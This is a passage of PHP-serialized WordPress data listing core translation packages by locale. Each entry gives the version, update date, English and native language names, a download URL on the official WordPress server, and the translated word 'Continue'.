(Australia)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_ZA\";a:8:{s:8:\"language\";s:5:\"en_ZA\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-01-26 15:53:43\";s:12:\"english_name\";s:22:\"English (South Africa)\";s:11:\"native_name\";s:22:\"English (South Africa)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.7/en_ZA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_NZ\";a:8:{s:8:\"language\";s:5:\"en_NZ\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 08:21:28\";s:12:\"english_name\";s:21:\"English (New Zealand)\";s:11:\"native_name\";s:21:\"English (New Zealand)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_NZ.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 21:51:20\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 02:09:59\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-09 01:07:24\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-31 15:12:02\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_MX.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_VE\";a:8:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-30 16:09:17\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_VE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CO\";a:8:{s:8:\"language\";s:5:\"es_CO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-13 17:00:30\";s:12:\"english_name\";s:18:\"Spanish (Colombia)\";s:11:\"native_name\";s:20:\"Español de Colombia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_CO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 23:35:48\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_ES.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"es\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_GT\";a:8:{s:8:\"language\";s:5:\"es_GT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 14:57:32\";s:12:\"english_name\";s:19:\"Spanish (Guatemala)\";s:11:\"native_name\";s:21:\"Español de Guatemala\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_GT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_AR\";a:8:{s:8:\"language\";s:5:\"es_AR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 03:17:36\";s:12:\"english_name\";s:19:\"Spanish (Argentina)\";s:11:\"native_name\";s:21:\"Español de Argentina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_AR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-09 09:36:22\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/es_PE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-28 20:09:49\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/es_CL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CR\";a:8:{s:8:\"language\";s:5:\"es_CR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-01 17:54:52\";s:12:\"english_name\";s:20:\"Spanish (Costa Rica)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/es_CR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"et\";a:8:{s:8:\"language\";s:2:\"et\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 16:37:11\";s:12:\"english_name\";s:8:\"Estonian\";s:11:\"native_name\";s:5:\"Eesti\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/et.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"et\";i:2;s:3:\"est\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Jätka\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 15:31:51\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:3:\"4.8\";s:7:\"updated\";s:19:\"2017-06-09 15:50:45\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 11:00:29\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 14:21:50\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_BE\";a:8:{s:8:\"language\";s:5:\"fr_BE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 09:14:18\";s:12:\"english_name\";s:16:\"French (Belgium)\";s:11:\"native_name\";s:21:\"Français de Belgique\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/fr_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_CA\";a:8:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-18 16:10:50\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/fr_CA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-08-23 17:41:37\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 16:43:49\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"gu\";a:8:{s:8:\"language\";s:2:\"gu\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 21:13:24\";s:12:\"english_name\";s:8:\"Gujarati\";s:11:\"native_name\";s:21:\"ગુજરાતી\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/gu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gu\";i:2;s:3:\"guj\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:31:\"ચાલુ રાખવું\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:5:\"4.4.2\";s:7:\"updated\";s:19:\"2015-12-05 00:59:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.4.2/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 06:33:35\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"המשך\";}}s:5:\"hi_IN\";a:8:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 10:29:26\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/hi_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hi\";i:2;s:3:\"hin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"जारी\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-07 15:11:19\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:48:39\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Folytatás\";}}s:2:\"hy\";a:8:{s:8:\"language\";s:2:\"hy\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-03 16:21:10\";s:12:\"english_name\";s:8:\"Armenian\";s:11:\"native_name\";s:14:\"Հայերեն\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/hy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hy\";i:2;s:3:\"hye\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Շարունակել\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 12:45:08\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-04-13 13:55:54\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.7/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-07 11:16:13\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-09 07:51:37\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"続ける\";}}s:5:\"jv_ID\";a:8:{s:8:\"language\";s:5:\"jv_ID\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-10 10:29:02\";s:12:\"english_name\";s:8:\"Javanese\";s:11:\"native_name\";s:9:\"Basa Jawa\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/jv_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"jv\";i:2;s:3:\"jav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Nerusaké\";}}s:5:\"ka_GE\";a:8:{s:8:\"language\";s:5:\"ka_GE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-09 06:06:41\";s:12:\"english_name\";s:8:\"Georgian\";s:11:\"native_name\";s:21:\"ქართული\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ka_GE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ka\";i:2;s:3:\"kat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"გაგრძელება\";}}s:3:\"kab\";a:8:{s:8:\"language\";s:3:\"kab\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-22 15:33:00\";s:12:\"english_name\";s:6:\"Kabyle\";s:11:\"native_name\";s:9:\"Taqbaylit\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.3/kab.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"kab\";i:3;s:3:\"kab\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Kemmel\";}}s:2:\"km\";a:8:{s:8:\"language\";s:2:\"km\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-07 02:07:59\";s:12:\"english_name\";s:5:\"Khmer\";s:11:\"native_name\";s:27:\"ភាសាខ្មែរ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/km.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"km\";i:2;s:3:\"khm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"បន្ត\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-10 13:54:32\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:3:\"ckb\";a:8:{s:8:\"language\";s:3:\"ckb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:48:25\";s:12:\"english_name\";s:16:\"Kurdish (Sorani)\";s:11:\"native_name\";s:13:\"كوردی‎\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ckb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ku\";i:3;s:3:\"ckb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"به‌رده‌وام به‌\";}}s:2:\"lo\";a:8:{s:8:\"language\";s:2:\"lo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 09:59:23\";s:12:\"english_name\";s:3:\"Lao\";s:11:\"native_name\";s:21:\"ພາສາລາວ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/lo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lo\";i:2;s:3:\"lao\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"ຕໍ່​ໄປ\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 19:49:17\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:2:\"lv\";a:8:{s:8:\"language\";s:2:\"lv\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-03-17 20:40:40\";s:12:\"english_name\";s:7:\"Latvian\";s:11:\"native_name\";s:16:\"Latviešu valoda\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.7/lv.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lv\";i:2;s:3:\"lav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Turpināt\";}}s:5:\"mk_MK\";a:8:{s:8:\"language\";s:5:\"mk_MK\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-01-26 15:54:41\";s:12:\"english_name\";s:10:\"Macedonian\";s:11:\"native_name\";s:31:\"Македонски јазик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.7/mk_MK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mk\";i:2;s:3:\"mkd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Продолжи\";}}s:5:\"ml_IN\";a:8:{s:8:\"language\";s:5:\"ml_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:43:32\";s:12:\"english_name\";s:9:\"Malayalam\";s:11:\"native_name\";s:18:\"മലയാളം\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ml_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ml\";i:2;s:3:\"mal\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"തുടരുക\";}}s:2:\"mn\";a:8:{s:8:\"language\";s:2:\"mn\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-12 07:29:35\";s:12:\"english_name\";s:9:\"Mongolian\";s:11:\"native_name\";s:12:\"Монгол\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/mn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mn\";i:2;s:3:\"mon\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"Үргэлжлүүлэх\";}}s:2:\"mr\";a:8:{s:8:\"language\";s:2:\"mr\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-30 06:25:41\";s:12:\"english_name\";s:7:\"Marathi\";s:11:\"native_name\";s:15:\"मराठी\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/mr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mr\";i:2;s:3:\"mar\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"सुरु ठेवा\";}}s:5:\"ms_MY\";a:8:{s:8:\"language\";s:5:\"ms_MY\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-17 12:44:38\";s:12:\"english_name\";s:5:\"Malay\";s:11:\"native_name\";s:13:\"Bahasa Melayu\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ms_MY.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ms\";i:2;s:3:\"msa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Teruskan\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:6:\"4.1.20\";s:7:\"updated\";s:19:\"2015-03-26 15:57:42\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.1.20/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ဆောင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-02 21:02:39\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"ne_NP\";a:8:{s:8:\"language\";s:5:\"ne_NP\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-05 06:45:20\";s:12:\"english_name\";s:6:\"Nepali\";s:11:\"native_name\";s:18:\"नेपाली\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ne_NP.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ne\";i:2;s:3:\"nep\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:43:\"जारी राख्नुहोस्\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 11:56:12\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_BE\";a:8:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 17:21:51\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nl_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:12:\"nl_NL_formal\";a:8:{s:8:\"language\";s:12:\"nl_NL_formal\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 11:57:39\";s:12:\"english_name\";s:14:\"Dutch (Formal)\";s:11:\"native_name\";s:20:\"Nederlands (Formeel)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/4.8.3/nl_NL_formal.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-25 10:02:16\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk 